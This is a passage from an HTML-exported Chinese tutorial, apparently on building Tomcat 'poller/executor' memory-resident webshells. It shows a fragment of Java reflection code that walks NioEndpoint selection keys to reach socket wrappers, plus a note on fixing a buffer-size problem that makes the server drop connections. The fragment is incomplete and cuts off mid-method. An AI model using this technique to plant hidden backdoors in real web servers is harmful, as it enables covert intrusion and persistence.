Consolas;">),</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"kqueueWrapper"</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">),</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"updateList"</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                                    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">for</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> obj </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">:</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> linkedList</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                                        </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">try</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                                            </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">SelectionKey</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[]</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> selectionKeys </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">SelectionKey</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[])</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getField</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getField</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">obj</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"channel"</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">),</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"keys"</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    

                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                                            </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">for</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> tmp </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">:</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> selectionKeys</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                                                </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">try</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                                                    </span>NioEndpoint</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">NioSocketWrapper</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> nioSocketWrapper </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">NioEndpoint</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">NioSocketWrapper</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getField</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">tmp</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"attachment"</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">缺点：由于缓冲区设置成8192，并且我们发送 的HTTP消息也才不到2000字节，这就导致可读取的数据其实就是⼤于0的。⼀旦⼤于0就会抛出异常， 这个异常就导致服务器主动关闭连接</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">解决⽅案就是：有多少数据，ByteBuffer就设置成多⼤</span></span></span></span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">protected</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">void</span></span></span></span></span></span><span 